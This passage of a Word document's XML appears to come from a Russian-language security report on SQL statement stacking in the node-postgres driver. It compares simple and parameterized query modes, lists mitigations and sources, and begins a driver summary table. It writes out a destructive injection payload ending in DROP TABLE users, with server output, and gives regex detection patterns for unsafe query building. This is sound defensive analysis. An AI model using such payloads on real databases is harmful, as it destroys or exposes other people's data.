        <w:t>SELECT id, email FROM users WHERE name = 'x'; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8DF93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оба statement-а исполняются. node-postgres возвращает результаты обоих в одном объекте: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.rows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит rows от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.rowCount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — от последней команды (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → 0), а массив всех команд доступен через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result.results</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (внутреннее поле, в публичном API недокументировано стабильно). Приложение увидит «нормальный» JSON-ответ от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — таблица уже удалена, ошибки не будет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3205C140" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 2: extended (безопасный код, с values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D38C98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Значение payload едет как Bind-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC55C9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ED21E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FB5FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05BD18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если разработчик передаёт values, но в SQL-тексте присутствует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между значимыми токенами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D342A2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>await client.query('SELECT 1; DROP TABLE users', []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65429567" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A6BD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB794EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В JS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>err.code === '42601'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>err.routine === 'transformRawStmt'</w:t>
      </w:r>
      <w:r>
        <w:t>. Promise rejects, ни одна команда не исполнилась.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD96466" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает node-postgres от других драйверов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED734C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Отсутствие client-side экранирования</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даже в simple-режиме. У psycopg2, pgjdbc-simple, pgx-simple — экранирование значений на клиенте есть; у node-postgres только два режима: либо extended с раздельными сообщениями, либо raw simple без обработки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D0713" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Оба результата возвращаются в одном `result`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при удачном стакинге (R20). У asyncpg виден только последний, у psycopg3 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nextset()</w:t>
      </w:r>
      <w:r>
        <w:t>, у node-postgres — в одном объекте сразу. Это упрощает эксфильтрацию через UNION + второй statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB51CEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Template literals — синтаксический трап</w:t>
      </w:r>
      <w:r>
        <w:t>. Удобство JavaScript template literals (`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SELECT ${x}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`) делает уязвимую форму короче и эстетичнее безопасной. Это статистически частая ошибка в Express/Fastify-кодбазах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E236C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg-format`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (отдельный npm-пакет, не часть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) предоставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('SELECT %L', value)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('SELECT %I', identifier)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для безопасной композиции — это аналог </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg.sql.SQL()</w:t>
      </w:r>
      <w:r>
        <w:t>. Без него безопасной композиции identifiers нет в стандартном API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600020F1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCA792" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда передавать values вторым массивом-аргументом. В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client\.query\(\s*[</w:t>
      </w:r>
      <w:r>
        <w:t>"][^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"]*\$\{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client\.query\(\s*[</w:t>
      </w:r>
      <w:r>
        <w:t>"][^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"]*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pool\.query\(\s*[</w:t>
      </w:r>
      <w:r>
        <w:t>"][^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"]*\$\{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Любой template literal без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после — критично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB58D11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg-format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для динамических identifiers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('SELECT * FROM %I WHERE id = %L', tableName, id)</w:t>
      </w:r>
      <w:r>
        <w:t>. Альтернатива — whitelist имён таблиц с проверкой до query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F196EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   ORM (Prisma, Drizzle, Kysely, Sequelize) поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строит параметризованные запросы автоматически. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$queryRaw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Prisma и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql.raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Drizzle — escape hatch, требующий тех же предосторожностей, что и сырой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg.query</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37BC17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Avoid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg-native</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без необходимости: это libpq-обёртка, поведение для multi-statement отличается (libpq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда simple).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3137AED3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg\.query\(.*\$\{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format!.*pg\.query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, конкатенация SQL-строк перед вызовом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403AA0DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439C0FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   pg ≥ 7.0 (2017) — стабильное API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>client.query(text, values)</w:t>
      </w:r>
      <w:r>
        <w:t>. До 7.0 был callback-only, та же логика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AD4BB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pg 8.x — текущая, добавлены Promise-API улучшения, поведение по протоколу не меняется.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E0F28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg-native</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (libpq-binding) — отдельный пакет, поведение наследуется от libpq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexecParams</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D85868" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC476AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   node-postgres docs: «Queries» — https://node-postgres.com/features/queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09D671" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   node-postgres docs: «Parameterized query» — https://node-postgres.com/features/queries#parameterized-query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A746FBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pg-format: https://github.com/datalanche/node-pg-format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF7276" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pg issue #757 (multi-statement behavior) — https://github.com/brianc/node-postgres/issues/757</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006F9AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pg issue #1400 — https://github.com/brianc/node-postgres/issues/1400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A52F66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строки 337–338)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1835D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.7 Итоговая таблица: драйверы × режимы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD583FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сводка из 3.5.1–3.5.6. Колонки «Без параметров» и «С параметрами» — проходит ли stacking при типичной форме вызова API. «Force-simple» — есть ли механизм принудительно перевести даже параметризованный вызов в simple-режим. Подробности и payload-ы — в подразделах.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969"/>
        <w:gridCol w:w="2517"/>
        <w:gridCol w:w="2022"/>
        <w:gridCol w:w="2913"/>
        <w:gridCol w:w="1990"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="7F12BBCC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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33584DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Драйвер</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736C0BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Версия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A8D042E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Без параметров → стакинг</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EE6134E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>С параметрами → стакинг</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B7F72D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
